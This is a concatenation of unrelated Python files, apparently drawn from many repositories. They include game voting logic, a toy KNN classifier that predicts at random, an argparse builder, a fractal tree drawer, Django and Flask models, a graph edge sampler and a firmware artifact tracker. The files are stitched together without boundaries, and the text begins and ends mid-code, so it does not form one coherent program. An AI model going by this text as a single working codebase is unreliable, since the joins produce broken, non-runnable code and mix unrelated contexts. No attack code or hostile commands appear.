player_data[user]['voted_correctly'] = True # Finds all players whose bluff was the choice and appends the name of the user for player in player_data: if not player_data[player]['submitted']: continue if room_data['player_data'][player]['submission'] == bluffs[choice_index]: room_data['player_data'][player]['votes_received'].append(user) # records that the user has votes player_data[user]['voted'] = True # Count number of people who have not voted num_no_vote = len([p for p in player_data if not player_data[p]['voted']]) # Handle Transition to Submission State if num_no_vote == 0: # Reset the Submission Status of all the players in the game for player in room_data['player_data']: player_data[player]['submitted'] = False # Toggle the Game State Variables room_data["game_data"]['waiting_for_votes'] = False room_data["game_data"]['waiting_for_submissions'] = True # Tally Scores for player in player_data: # Points for fooling others player_data[player]['score'] += ( 500 * game_data['round_number'] * len(room_data['player_data'][player]['votes_received'])) # Points for right answer player_data[player]['score'] += ( 1000 * player_data[player]['voted_correctly']) * game_data['round_number'] # Move on to next question if game_data['question_number'] == 3: game_data['round_number'] += 1 game_data['question_number'] = 1 elif game_data['round_number'] == 3: # Begin endgame room_data["game_data"]['waiting_for_submissions'] = False room_data["game_data"]['in_lobby'] = True pass else: game_data['question_number'] += 1 new_room_json = json.dumps(room_data) connection.execute('''UPDATE game_table SET game_data =? WHERE room_code =?;''', (new_room_json, room_code)).fetchall() conn.commit() # commit commands conn.close() # close connection to database return 'There are ' + str(num_no_vote) + ' player(s) who have not voted this round' import random from scipy.spatial import distance def euc(a, b): return distance.euclidean(a, b) class ScrappyKNN(): def fit(self, X_train, y_train): self.X_train = X_train self.y_train = y_train def predict(self, X_test): predictions = [] for row in X_test: #label = self.closest(row) label=random.choice(self.y_train) predictions.append(label) return predictions def closest(self, row): best_dist = euc(row, self.X_train[0]) best_index = 0 for i in range(1, len(self.X_train)): dist = euc(row, self.X_train[i]) if dist < best_dist: best_dist = dist best_index = i return self.y_train[best_index] from sklearn.datasets import load_iris from sklearn import tree iris = load_iris() X = iris.data y = iris.target from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.5) #from sklearn.neighbors import KNeighborsClassifier my_classifier = ScrappyKNN() my_classifier.fit(X_train, y_train) predictions = my_classifier.predict(X_test) from sklearn.metrics import accuracy_score print(accuracy_score(y_test, predictions)) #!/usr/local/bin/python2 # AQUI ELE JA ABRE E FECHA UM ARQUIVO with open('pessoas.csv') as arquivo: for registro in arquivo: print('nome: {}, idade: {}'.format(*registro.strip().split(','))) if arquivo.closed: print("o arquivo foi fechado!!")import os import numpy as np from pwtools.common import is_seq, file_write from .testenv import testdir def test_is_seq(): fn = os.path.join(testdir, 'is_seq_test_file') file_write(fn, 'lala') fd = open(fn , 'r') for xx in ([1,2,3], (1,2,3), np.array([1,2,3])): print(type(xx)) assert is_seq(xx) is True for xx in ('aaa', fd): print(type(xx)) assert is_seq(xx) is False fd.close() agpypeline/algorithm.py """Template class for a Transformer Algorithm """ from agpypeline.environment import Environment, CheckMD class Algorithm: """Class for containing a Transformer Algorithm """ def __init__(self): """Initializes a class instance """ def perform_process(self, environment: Environment, check_md: CheckMD, transformer_md: dict, full_md: list) -> dict: """Perform the processing of data Arguments: environment: instance of Environment class check_md: metadata for this Transformer execution run transformer_md: transformer specific information from previous runs full_md: the list of loaded metadata """ # pylint: disable=unused-argument,no-self-use raise RuntimeError("The Algorithm class method perform_process() must be overridden by a derived class") """A builder class for :class:`argparse.ArgumentParser`.""" from argparse import ArgumentParser, BooleanOptionalAction __all__ = ['ArgParseBuilder'] _subcommand_name = 'subcommand_name' # attribute name in result _subcommand_func = 'subcommand_func' # attribute name in result class ArgParseBuilder: """Builder for an :class:`~argparse.ArgumentParser`. Takes the same ``kwargs`` as :class:`~argparse.ArgumentParser`, but ``allow_abbrev`` defaults to ``False``, ``add_help`` is ignored and always ``False``, and from ``prefix_chars`` the first character is used for all options/flags. All methods except :meth:`finish` return ``self``. :param parser_class: the argument parser class; defaults to :class:`~argparse.ArgumentParser` :type parser_class: argparse.ArgumentParser :param kwargs: see :class:`~argparse.ArgumentParser` """ def __init__(self, *, parser_class=None, **kwargs): if parser_class is not None and ( not isinstance(parser_class, type) or not issubclass(parser_class, ArgumentParser)): raise TypeError("'parser_class' must be a subclass of" " argparse.ArgumentParser") if 'allow_abbrev' not in kwargs: kwargs['allow_abbrev'] = False kwargs['add_help'] = False if parser_class: self._parser = parser_class(**kwargs) else: self._parser = ArgumentParser(**kwargs) if kwargs.get('fromfile_prefix_chars') is not None: self._parser.convert_arg_line_to_args = lambda line: line.split() self._short_prefix = self._parser.prefix_chars[0] self._long_prefix = self._parser.prefix_chars[0] * 2 self._arg_group = None self._xcl_group = None self._subcommands_attrs = dict(title='subcommands', dest=_subcommand_name) self._subparsers = None self._subcommand = None def set_description(self, descr): """Set the ``description`` attribute of the parser. :param str descr: description string """ self._parser.description = descr return self def set_epilog(self, epilog): """Set the ``epilog`` attribute of the parser. :param str epilog: epilog string """ self._parser.epilog = epilog return self def _add_argument(self, short=None, long=None, **kwargs): """Call :meth:`~argparse.ArgumentParser.add_argument`. ``kwargs``: all arguments after ``name or flags...`` (for positional arguments use ``dest`` for the name) """ options_or_flags = [] if short: options_or_flags.append(self._short_prefix + short) if long: options_or_flags.append(self._long_prefix + long) if self._xcl_group: self._xcl_group.add_argument(*options_or_flags, **kwargs) elif self._arg_group: self._arg_group.add_argument(*options_or_flags, **kwargs) elif self._subcommand: self._subcommand.add_argument(*options_or_flags, **kwargs) else: self._parser.add_argument(*options_or_flags, **kwargs) return self def add_help(self, short='h', long='help', *, help='show this help message and exit'): """Add help. :param str short: short option :param str long: long option :param str help: help text """ self._add_argument(short, long, help=help, action='help') return self def add_version(self, short='V', long='version', *, version=None, string=None, help='show version and exit'): """Add version. If ``string`` is set it will be printed, else if ``version`` is set the resulting string will be ``prog + ' ' + version``. :param str short: short option :param str long: long option :param version: version; if it is a :class:`tuple` it will be converted to a string :type version: string or tuple :param string: version string :param str help: help text """ if isinstance(version, tuple): version = '.'.join(map(str, version)) if version and not string: string = f'{self._parser.prog} {version}' if string: self._add_argument(short, long, help=help, action='version', version=string) return self def add_flag(self, short=None, long=None, *, count=False, dest=None, const=None, help=None): """Add flag. :param str short: short option :param str long: long option :param bool count: if ``True`` count the number of times the flag occurs :param str dest: name of the list to which the values will be appended; ignored if ``count`` is set :param const: only used if ``dest`` is set; defaults to the flag name :param str help: help text If ``long`` ends with ``|no``, a negative flag will be added, i.e. for a flag ``--foo`` there will be a flag ``--no-foo``. In this case ``count`` and ``dest`` will be ignored. """ if long and long.endswith('|no'): self._add_argument(short, long[:-3], action=BooleanOptionalAction, help=help) elif count: self._add_argument(short, long, action='count', default=0, help=help) elif dest: if const is None: const = long or short self._add_argument(short, long, action='append_const', dest=dest, const=const, help=help) else: self._add_argument(short, long, action='store_true', help=help) return self def add_opt(self, short=None, long=None, *, type=None, nargs=None, default=None, const=None, choices=None, required=False, multiple=False, metavar=None, help=None): """Add option. :param str short: short option :param str long: long option :param type: see :meth:`~argparse.ArgumentParser.add_argument` :param nargs: see :meth:`~argparse.ArgumentParser.add_argument` :param default: see :meth:`~argparse.ArgumentParser.add_argument` :param const: see :meth:`~argparse.ArgumentParser.add_argument` :param choices: see :meth:`~argparse.ArgumentParser.add_argument` :param required: see :meth:`~argparse.ArgumentParser.add_argument` :param bool multiple: if ``True`` this option can be used multiple times and all values are appended to a list :param metavar: see :meth:`~argparse.ArgumentParser.add_argument` :param str help: help text """ if const is not None and not nargs: nargs = '?' action = None elif multiple: action = 'append' else: action = 'store' self._add_argument(short, long, type=type, nargs=nargs, default=default, const=const, choices=choices, metavar=metavar, required=required, help=help, action=action) return self def add_pos(self, name, *, type=None, nargs=None, default=None, choices=None, metavar=None, help=None): """Add positional argument. :param str name: name of argument :param type: see :meth:`~argparse.ArgumentParser.add_argument` :param nargs: see :meth:`~argparse.ArgumentParser.add_argument` :param default: see :meth:`~argparse.ArgumentParser.add_argument` :param choices: see :meth:`~argparse.ArgumentParser.add_argument` :param metavar: see :meth:`~argparse.ArgumentParser.add_argument` :param str help: help text """ self._add_argument(dest=name, type=type, nargs=nargs, default=default, choices=choices, metavar=metavar, help=help) return self def add_mutually_exclusive_group(self, required=False): """Add mutually exclusive group. See: :meth:`argparse.ArgumentParser.add_mutually_exclusive_group` """ if self._arg_group: self._xcl_group = self._arg_group.add_mutually_exclusive_group( required=required) elif self._subcommand: self._xcl_group = self._subcommand.add_mutually_exclusive_group( required=required) else: self._xcl_group = self._parser.add_mutually_exclusive_group( required=required) return self def finish_mutually_exclusive_group(self): """Finish mutually exclusive group. Adding a new mutually exclusive or argument group or a subcommand will finish a current mutually exclusive group implicitly. """ self._xcl_group = None return self def add_argument_group(self, title=None, description=None): """Add argument group. See: :meth:`argparse.ArgumentParser.add_argument_group` """ self._xcl_group = None if self._subcommand: self._arg_group = self._subcommand.add_argument_group( title, description) else: self._arg_group = self._parser.add_argument_group( title, description) return self def finish_argument_group(self): """Finish argument group. Adding a new argument group or a subcommand will finish a current argument group implicitly. """ self._xcl_group = None self._arg_group = None return self def set_subcommands_attrs(self, **kwargs): """Set attributes for subcommands. If used at all, it must be called before first call to :meth:`add_subcommand`. :param kwargs: same arguments as for :meth:`~argparse.ArgumentParser.add_subparsers` """ self._subcommands_attrs.update(kwargs) return self def add_subcommand(self, name, *, func=None, **kwargs): """Add subcommand. :param str name: name of the subcommand; will be available in the result after argument parsing under the name ``subcommand_name`` :param callable func: can be called when the subcommand is invoked; will be available in the result after argument parsing under the name ``subcommand_func`` :param kwargs: same arguments as for the method ``add_parser()`` which is decribed in the documentation of :meth:`~argparse.ArgumentParser.add_subparsers` """ if not self._subparsers: self._subparsers = self._parser.add_subparsers( **self._subcommands_attrs) self._xcl_group = None self._arg_group = None if 'prefix_chars' not in kwargs: kwargs['prefix_chars'] = self._parser.prefix_chars kwargs['add_help'] = False self._subcommand = self._subparsers.add_parser(name, **kwargs) if func: self._subcommand.set_defaults(**{_subcommand_func: func}) return self def finish_subcommand(self): """Finish subcommand. Adding a new subcommand will finish a current subcommand implicitly. """ self._xcl_group = None self._arg_group = None self._subcommand = None return self def finish(self): """Finish the builder and return the argument parser.""" self._xcl_group = None self._arg_group = None self._subcommand = None return self._parser fraserlove/pythonsimulations-and-generators/fractal-trees/fractal_trees.py10-100 """ Fractal Trees Generator Created 14/08/19 Developed by Generates random fractal trees by creating branch objects which are a line between two position vectors marking the start and end of the branch. These branches are then stored in an array called tree and shown to the user. """ import pygame, branch, math, copy, random dimensions = (3000, 1000) leaves_colour = (40,140,40) branch_colour = "white" bg_colour = "black" show_leaves = False # Choose to reveal leaves on the top layer forest_size = 20 min_branch_size = 130 # The minimum size of the root branch to start scaling down max_branch_size = 260 # The maximum size of the root branch to start scaling down branch_reduction = 0.75 # The amount to scale down each new branch from the previous branch top_layer = 10 # The maximum layers to draw class Display: """ A display object to setup and run the program with pygame """ def __init__(self, dimensions): self.dimensions = dimensions self.display = pygame.display.set_mode(dimensions) self.running = True self.forest = [] # List storing all of the trees self.tree = [] # List storing all of the branches self.leaves = [] self.setup() def setup(self): """ Setting up the display and storing our initial root branch """ self.display.fill(bg_colour) pygame.display.set_caption("Fractal Tree Generator") for i in range(forest_size): branch_size = random.randint(min_branch_size, max_branch_size) x = random.randint(0, self.dimensions[0]) a = branch.Vector(x, self.dimensions[1]) b = branch.Vector(x, self.dimensions[1] - branch_size) root = branch.Branch(a, b) self.tree.append(root) self.forest.append(self.tree) self.run() def draw(self): """ Method to draw all branches and leaves on screen """ self.display.fill(bg_colour) for branch in self.tree: branch.show(self.display, branch_colour) for leave in self.leaves: pygame.draw.circle(self.display, leaves_colour, (int(leave.x), int(leave.y)), 2) pygame.display.update() def run(self): """ Main program loop """ layer = 0 while self.running: for event in pygame.event.get(): if event.type == pygame.QUIT: self.running = False for tree in self.forest: if layer < top_layer: for i in range(len(tree)): if not tree[i].finished: tree.append(tree[i].branch_off(math.pi / random.randint(4,top_layer-layer+8), branch_reduction)) tree.append(tree[i].branch_off(-math.pi / random.randint(4,top_layer-layer+8), branch_reduction)) tree[i].finished = True layer += 1 if layer == top_layer: for i in range(len(tree)): if not tree[i].finished: if show_leaves: self.leaves.append(copy.copy(tree[i].end)) self.draw() if __name__ == "__main__": pygame.init() viewer = Display(dimensions) 10-100 """Common configure functions for system""" # Python import logging # Unicon from unicon.core.errors import SubCommandFailure log = logging.getLogger(__name__) def config_license(device, license): """ Config license on Device Args: device (`obj`): Device object license (`str`): License name Return: None Raise: SubCommandFailure: Failed configuring interface """ try: device.configure("license boot level {license}".format(license=license)) except SubCommandFailure as e: raise SubCommandFailure( 'Could not configure license {license}, Error: {error}'.format( license=license, error=e) ) Gathered CTF writeups/ctf-7867/2020/pbctf/queensarah2/graphic.py1-10 from string import ascii_lowercase from itertools import product import gizeh import numpy as np import random random.seed(1234) alphabet = ascii_lowercase + "_" bigrams = [''.join(bigram) for bigram in product(alphabet, repeat=2)] random.shuffle(bigrams) scale = 2 width = 512 * scale height = 512 * scale def draw(bs, name, theta_offset=0): surface = gizeh.Surface(width=width, height=height) r = width / 2 * 3/4 offset = [width / 2, height / 2] theta_step = (2 * np.pi) / (len(bs)) i = 0 for theta in np.linspace(0, 2 * np.pi, len(bs) + 1)[:-1]: t = theta + (theta_offset * theta_step / 2) xy = [r * np.sin(t) + offset[0], r * np.cos(t) + offset[1]] text = gizeh.text( bs[i], fontfamily="monospace", fontsize=20 * scale, fill=(0, 0, 0), xy=xy, angle=0 ) text.draw(surface) i += 1 surface.write_to_png("gen/" + name + ".png") even = bigrams[:16] even0 = [x for i, x in enumerate(even) if i % 2 == 0] even1 = [x for i, x in enumerate(even) if i % 2 == 1] bigrams = bigrams[16:] draw(even, "even") draw(even0, "even0") draw(even1, "even1", theta_offset=1) odd = bigrams[:15] bigrams = bigrams[15:] draw(odd, "odd") #!/usr/bin/python import sys, re, os providermap = {} permissions = [] def readProviderMap(filename): global providermap f = open(filename) for line in f: lineS = line.split(",") providermap[lineS[0]] = lineS[1].rstrip() f.close() def readStringList(filename): global permissions f = open(filename) and_pattern = re.compile('.+ and .+',re.IGNORECASE) for line in f: lineS = line.split(" ") uri = lineS[0].rstrip("/") if not checkMap(uri): parts = uri.split("/") partialuri = "" for part in parts: if (part != "content:"): partialuri = partialuri + "/" + part checkMap(partialuri) else: partialuri = part def checkMap(uri): global providermap and_pattern = re.compile('.+ and .+',re.IGNORECASE) if uri in providermap: perm = providermap[uri] if and_pattern.match(perm): perms = perm.split(" and ") for i in perms: print i else: print perm sys.stderr.write(uri+" ["+perm+"]\n") return True else: return False def main(): readProviderMap("providermap.csv"); readStringList(sys.argv[1]) if __name__ == "__main__": main() akulakov/rescaler from django.db import models class Item(models.Model): name = models.CharField(max_length=120) size = models.FloatField() notes = models.TextField(null=True, blank=True) def __unicode__(self): return self.name class Meta: ordering = ("size",) 0 from werkzeug.security import generate_password_hash, check_password_hash from flask import Flask, render_template, request, redirect, url_for from flask_sqlalchemy import SQLAlchemy from datetime import datetime app = Flask(__name__) app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///blog.db' app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False db = SQLAlchemy(app) class coins(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(50), unique=True) news = db.Column(db.String(1000), nullable=True) def __repr__(self): return f"" @app.route("/coins", methods=("POST", "GET")) def register(): if request.method == "POST": # здесь должна быть проверка корректности введенных данных try: p = coins(name=request.form['name'], news=request.form['news']) db.session.add(p) db.session.commit() except: db.session.rollback() print("Ошибка добавления в БД") return redirect(url_for('index')) return '''

Coin name

''' if __name__ == "__main__": app.run(debug=True)#!/usr/bin/env python """ Random graph from given degree sequence. """ # Author: () # Date: 2004-11-03 08:11:09 -0700 (Wed, 03 Nov 2004) # Revision: 503 # Copyright (C) 2004-2016 by # <> # <> # <> # All rights reserved. # BSD license. from networkx import * z=[5,3,3,3,3,2,2,2,1,1,1] print(is_valid_degree_sequence(z)) print("Configuration model") G=configuration_model(z) # configuration model degree_sequence=list(degree(G).values()) # degree sequence print("Degree sequence %s" % degree_sequence) print("Degree histogram") hist={} for d in degree_sequence: if d in hist: hist[d]+=1 else: hist[d]=1 print("degree #nodes") for d in hist: print('%d %d' % (d,hist[d])) # Generated by Django 3.0.7 on 2020-07-30 04:44 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='OpenShiftCurrentAdvisory', fields=[ ('log_openshift_release_advisory_id', models.AutoField(primary_key=True, serialize=False)), ('openshift_version', models.CharField(max_length=50)), ('advisory_type', models.CharField(max_length=100)), ('current_advisory_id', models.CharField(max_length=20)), ('previous_advisory_id', models.CharField(max_length=20)), ], options={ 'db_table': 'log_openshift_release_advisory', }, ), ] python/veilgraph/dataset/sample_edges.py0 #!/usr/bin/env python3 __copyright__ = """ Copyright 2018 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ __license__ = "Apache 2.0" # Uniformly sample edges from a .tsv file. # Number of samples may be given as an absolute value or percentage of # edges of the provided file. # The user may choose to randomize the resulting stream file. ########################################################################### ################################# IMPORTS ################################# ########################################################################### # PEP 8 Style Guide for imports: https://www.python.org/dev/peps/pep-0008/#imports # 1. standard library imports import argparse import io from typing import List import os import pathlib import random import sys # 2. related third party imports # 3. custom local imports from veilgraph import localutil ########################################################################### ############################# READ ARGUMENTS ############################## ########################################################################### # The class argparse.RawTextHelpFormatter is used to keep new lines in help text. DESCRIPTION_TEXT = "VeilGraph edge sampler. Take a graph, sample some edges and produce a new graph file and a stream file." parser = argparse.ArgumentParser(description=DESCRIPTION_TEXT, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-i', '--input-file', help="dataset name.", required=True, type=str) parser.add_argument('-o', '--out-dir', help="output directory.", required=False, type=str) parser.add_argument('-p', '--sample-probability', help='set desired sampling probability to generate the stream.', required=False, type=float, nargs='?', const=-1.0) parser.add_argument('-c', '--sample-count', help='number of samples to include in the generated stream.', required=False, type=int, nargs='?', const=-1) parser.add_argument('-r', '--randomize', help='randomize the sampled edges.', required=False, action="store_true") parser.add_argument('-d', '--debug', help='debug mode outputs helpful information.', required=False, action="store_true") parser.add_argument("-q", "--query-count", help="stream query count.", required=True, type=int) parser.add_argument("-deletion-ratio", help="number of edges to be deleted, as a fraction of stream chunk size.", required=False, type=float, default=0.20) args = parser.parse_args() # Sanitize arguments. if (not args.out_dir is None): if len(args.out_dir) == 0: print("> -out-dir must be a non-empty string. Exiting") sys.exit(1) if not (os.path.exists(args.out_dir) and os.path.isdir(args.out_dir)): print("> Provided output directory does not exist: {}. Exiting".format(args.out_dir)) sys.exit(1) # This condition checks if either are both true or both false. if args.sample_probability == args.sample_count: print("> Must supply exactly one of '-sample-count' or '-sample-probability'. Exiting.") sys.exit(1) if args.sample_count != None and args.sample_count <= 0: print("> '-sample-count' value must be a positive integer. Exiting.") sys.exit(1) if args.sample_probability != None and (args.sample_probability <= 0 or args.sample_probability > 1): print("> '-sample_probability' value must be a positive float in ]0; 1]. Exiting.") sys.exit(1) if args.query_count < 0: print("> '-query-count' must be positive. Exiting.") sys.exit(1) if args.deletion_ratio < 0.0: print("> '-deletion-ratio' must be positive. Exiting.") sys.exit(1) if args.input_file.startswith('~'): args.input_file = os.path.expanduser(args.input_file).replace('\\', '/') ########################################################################### ############################### APPLICATION ############################### ########################################################################### # Count the number of valid edge lines and note indexes of invalid input lines. input_line_count, bad_indexes = localutil.file_stats(args.input_file) bad_index_count = len(bad_indexes) # Calculate the sampling probability and stream size. if args.sample_count != None: stream_size = args.sample_count p = stream_size / (input_line_count - bad_index_count) else: p = args.sample_probability stream_size = int((input_line_count - bad_index_count) * p) out_file_name = args.input_file[:args.input_file.rfind(".")] if os.path.sep in out_file_name: out_file_name = out_file_name[args.input_file.rfind(os.path.sep) + 1:] else: out_file_name = out_file_name[args.input_file.rfind("/") + 1:] # Output directory, if it doesn't exist, will be created based on the input file name. if args.out_dir is None: out_dir = os.path.dirname(args.input_file) out_file_name = out_file_name.replace('-original', '') out_file_name = out_file_name + "-" + str(stream_size) if args.randomize: if args.debug: print("> Randomizing stream file.") # Explicitly state in the file names that the stream edges were randomized. out_file_name = out_file_name + "-random" # Get parent dir of provided input file. input_file_parent_dir = os.path.abspath(os.path.join(out_dir, os.pardir)) # Create the output directory based on the target output file name. out_dir = os.path.join(input_file_parent_dir, out_file_name) # Create the output directory if it does not exist. pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True) else: out_dir = args.out_dir if out_dir.startswith('~'): out_dir = os.path.expanduser(out_dir).replace('\\', '/') out_graph_path = os.path.join(out_dir, "{}-start.tsv".format(out_file_name)) out_stream_path = os.path.join(out_dir, "{}-stream.tsv".format(out_file_name)) out_deletions_path = os.path.join(out_dir, "{}-deletions.tsv".format(out_file_name)) print("> Output directory:\t\t{}".format(out_dir)) print("> Out file name base:\t\t{}".format(out_file_name)) print("> Input file:\t\t\t{}".format(args.input_file)) print("> Input line count:\t\t{}".format(input_line_count)) print("> Invalid line count:\t\t{}".format(bad_index_count)) print("> Valid line count:\t\t{}".format(input_line_count - bad_index_count)) print("\n") print("> Bad indexes:\t{}".format(bad_indexes)) print("\n") print("> Target stream file:\t\t{}".format(out_stream_path)) print("> Target stream size:\t\t{}".format(stream_size)) print("> Stream sampling probability:\t\t{}".format(p)) print("\n") print("> Target deletions file:\t{}".format(out_deletions_path)) # Sample and write resulting base graph and edge stream files. with open(args.input_file, 'r') as dataset, open(out_graph_path, 'w') as out_graph_file, open(out_stream_path, 'w') as out_stream_file: #https://stackoverflow.com/questions/19286657/index-all-except-one-item-in-python base_lines = [] stream_lines = [] sample_count = 0 valid_ctr = 0 for i, l in enumerate(dataset): # If the line is not empty and is not a comment (begins with '#'). if not i in bad_indexes: p = (stream_size - sample_count) / (input_line_count - valid_ctr) valid_ctr = valid_ctr + 1 if sample_count != stream_size and random.random() < p: #if args.debug: #print("> Stream sampled (p={}) {}/{}\t(input position: {}).".format(p, sample_count+1, stream_size, i)) sample_count = sample_count + 1 stream_lines.append(l.strip()) else: base_lines.append(l.strip()) # Efficient storage of the base graph lines to disk. if len(base_lines) == io.DEFAULT_BUFFER_SIZE: out_graph_file.write('\n'.join(base_lines) + "\n") base_lines = [] if valid_ctr == input_line_count: break # Write the last set of edges, whose number was less than 'io.DEFAULT_BUFFER_SIZE'. if len(base_lines) > 0: len_diff = stream_size - len(stream_lines) if args.debug: print("> Length difference:\t{}".format(len_diff)) if len_diff > 0: aux_draw = random.sample(base_lines, len_diff) print("> Stream supplement draw:\t{}".format(aux_draw)) stream_lines = stream_lines + aux_draw base_lines = [l for l in base_lines if l not in aux_draw] if len(base_lines) > 0: out_graph_file.write('\n'.join(base_lines) + "\n") # Is stream order randomization required? if args.randomize: random.shuffle(stream_lines) # Store the stream edges to disk. out_stream_file.write('\n'.join(stream_lines) + "\n") out_stream_file.flush() # Get the chunk properties for the generated stream. chunk_size, chunk_sizes, _, stream_edge_count, _ = localutil.prepare_stream(out_stream_path, args.query_count) print("> Stream chunk size:\t\t{}".format(chunk_size)) print("> Stream chunk count:\t\t{}".format(len(chunk_sizes))) print("> Stream edge count:\t\t{}".format(stream_edge_count)) print('> Stream line count:\t\t{}'.format(len(stream_lines))) print('\n') # Number of edges deletions sent each time a block of the update stream is sent. deletion_size = int(args.deletion_ratio * chunk_size) # On what stream block are we? block_acc = 0 base_graph_index_limit = valid_ctr + bad_index_count - stream_edge_count deletions = [] for i in range(len(chunk_sizes)): if args.debug: print('> Drawing {} lines from interval [{};{}={} + {}]'.format( deletion_size, bad_index_count, base_graph_index_limit + block_acc, base_graph_index_limit, block_acc)) # Draw a sample from the original graph plus all the previous chunk blocks we've already iterated over. draw_interval_range = range(bad_index_count, base_graph_index_limit + block_acc) # PROBLEM: since the stream was shuffled, for a base graph with 10000 edges and a stream of size 1000, it's possible that stream element 0015 (belonging to first stream chunk before shuffling) was shuffled into position 0859. This means there will be a deletion order for an edge that hasn't been added yet. print("> Draw interval range:\t{}".format(draw_interval_range)) # Keep drawing samples until there isn't a single repetition in 'deletions'. while True: del_block = random.sample(draw_interval_range, deletion_size) repetitions = 0 for j in del_block: if j in deletions: repetitions = repetitions + 1 break if repetitions == 0: break deletions = deletions + del_block # 'block_acc' sets the upper limit for the sampling procedure. block_acc = block_acc + chunk_sizes[i] # 'deletions' contains indexes associated with the sampled edges to be deleted. # Need to retrieve the associated edge strings. deletion_strings = len(deletions) * [''] if args.debug: print("> Deletion count:\t{}".format(len(deletions))) print("> Base graph index limit:\t{}".format(base_graph_index_limit)) #base_deletion_indexes = [] base_deletion_indexes = set() aux = {} for i in range(len(deletions)): # String is part of the base graph file. if args.debug: print("> Current deletion:\t{}\t{}".format(i, deletions[i])) # If current edge to delete is part of the base graph ('..-start.tsv') if deletions[i] < base_graph_index_limit: #base_deletion_indexes.append(deletions[i]) base_deletion_indexes.add(deletions[i]) aux[deletions[i]] = i # String is part of a specific stream block. else: # Find the index inside the specific block and retrieve the string. global_stream_index = deletions[i] - base_graph_index_limit single_block_index = chunk_size * int((global_stream_index / chunk_size)) inner_block_index = global_stream_index - single_block_index single_block_index = int(single_block_index / chunk_size) if args.debug: print("> Drawing from block:\t{}\t({}:{})".format(global_stream_index, single_block_index, inner_block_index)) print("> deletion_strings[{}] = {}".format(i, stream_lines[global_stream_index])) deletion_strings[i] = stream_lines[global_stream_index] # Reread the input file to write the deletions file. #with open(args.input_file, 'r') as dataset, open(out_deletions_path, 'w') as out_deletions_file: with open(out_graph_path, 'r') as dataset, open(out_deletions_path, 'w') as out_deletions_file: for i, l in enumerate(dataset): #if (i % 20000 == 0): # print('> Input file line:\t{}'.format(i)) # print('> {}'.format(l.strip())) if i in base_deletion_indexes: deletion_strings[aux[i]] = l.strip() out_deletions_file.write('\n'.join(deletion_strings) + "\n") out_deletions_file.flush() if args.debug: print("\n") # Check if the deletion stream order is coherent with the update stream order. with open(out_deletions_path, 'r') as out_deletions_file, open(out_stream_path, 'r') as out_stream_file: deletion_lines = out_deletions_file.readlines() stream_lines = out_stream_file.readlines() curr_del_block = 1 for i in range(len(deletion_lines)): # Set current max allowed stream file index. if i % deletion_size == 0: curr_del_block = curr_del_block + 1 max_stream_index = curr_del_block * chunk_size curr_del_line = deletion_lines[i].strip() # If the current deletion line exists in the edge stream. if curr_del_line in stream_lines: curr_index = stream_lines.index(curr_del_line) # If its index is below the currently allowed max index. if curr_index >= max_stream_index: print("> Illegal deletion position.") print("> edge {} is at pos {} in the stream and the limit is {}".format(curr_del_line, curr_index, max_stream_index)) sys.exit(1)import sys def adjacency(mat_, g1, g2): mat_[g1].append(g2) mat_[g2].append(g1) return mat_ def dfs(gallery, visited): visited[gallery] = True children = [0]*len(cases) installed = 0 for adj_gallery in adj_mat[gallery]: if not visited[adj_gallery]: case, installation = dfs(adj_gallery, visited) children[case] += 1 installed += installation if children[cases.get('unwatched')]: installed += 1 return cases.get('installed'), installed if children[cases.get('installed')]: return cases.get('watched'), installed return cases.get('unwatched'), installed def installCamera(): installed = 0 for gallery in range(g): if not visited[gallery]: case, installation = dfs(gallery, visited) installed += installation if case == cases.get('unwatched'): installed += 1 return installed input_ = lambda: sys.stdin.readline() if __name__ == '__main__': C = int(input_()) cases = {'unwatched': 0, 'watched': 1, 'installed': 2} for _ in range(C): g, h = map(int, input_().split()) adj_mat = [[] for _ in range(g)] # installed = 0 visited = [False] * g for _ in range(h): g1, g2 = map(int, input_().split()) adj_mat = adjacency(adj_mat, g1, g2) print(installCamera()) import os from fotahubclient.json_document_models import ArtifactKind, LifecycleState, DeployedArtifacts, DeployedArtifact class DeployedArtifactsTracker(object): def __init__(self, config): self.config = config self.deployed_artifacts = DeployedArtifacts() def __enter__(self): if os.path.isfile(self.config.deployed_artifacts_path) and os.path.getsize(self.config.deployed_artifacts_path) > 0: self.deployed_artifacts = DeployedArtifacts.load_deployed_artifacts(self.config.deployed_artifacts_path) return self def register_os(self, name, deployed_revision, rollback_revision=None): self.__register_artifact(name, ArtifactKind.operating_system, deployed_revision, rollback_revision, LifecycleState.running) def register_app(self, name, deployed_revision, rollback_revision=None): self.__register_artifact(name, ArtifactKind.application, deployed_revision, rollback_revision, LifecycleState.available) def register_fw(self, name, deployed_revision, rollback_revision=None): self.__register_artifact(name, ArtifactKind.firmware, deployed_revision, rollback_revision, LifecycleState.running) def __register_artifact(self, name, kind, deployed_revision, rollback_revision, lifecycle_state): deployed_artifact = self.__lookup_deployed_artifact(name, kind) if deployed_artifact is not None: deployed_artifact.reinit(deployed_revision, rollback_revision, lifecycle_state) else: self.__append_deployed_artifact( DeployedArtifact( name, kind, deployed_revision, rollback_revision, lifecycle_state ) ) def erase_app(self, name): self.__erase_artifact(name, ArtifactKind.application) def erase_fw(self, name): self.__erase_artifact(name, ArtifactKind.firmware) def __erase_artifact(self, name, kind): deployed_artifact = self.__lookup_deployed_artifact(name, kind) if deployed_artifact is not None: self.__remove_deployed_artifact(deployed_artifact) def record_app_deployed_revision_change(self, name, deployed_revision, updating=True): deployed_artifact = self.__lookup_deployed_artifact(name, ArtifactKind.application) if deployed_artifact is not None: deployed_artifact.amend_revision_info(deployed_revision, updating) else: raise ValueError("Failed to record revision change for unknown application named '{}'".format(name)) def record_fw_deployed_revision_change(self, name, deployed_revision, updating=True): deployed_artifact = self.__lookup_deployed_artifact(name, ArtifactKind.firmware) if deployed_artifact is not None: deployed_artifact.amend_revision_info(deployed_revision, updating) else: raise 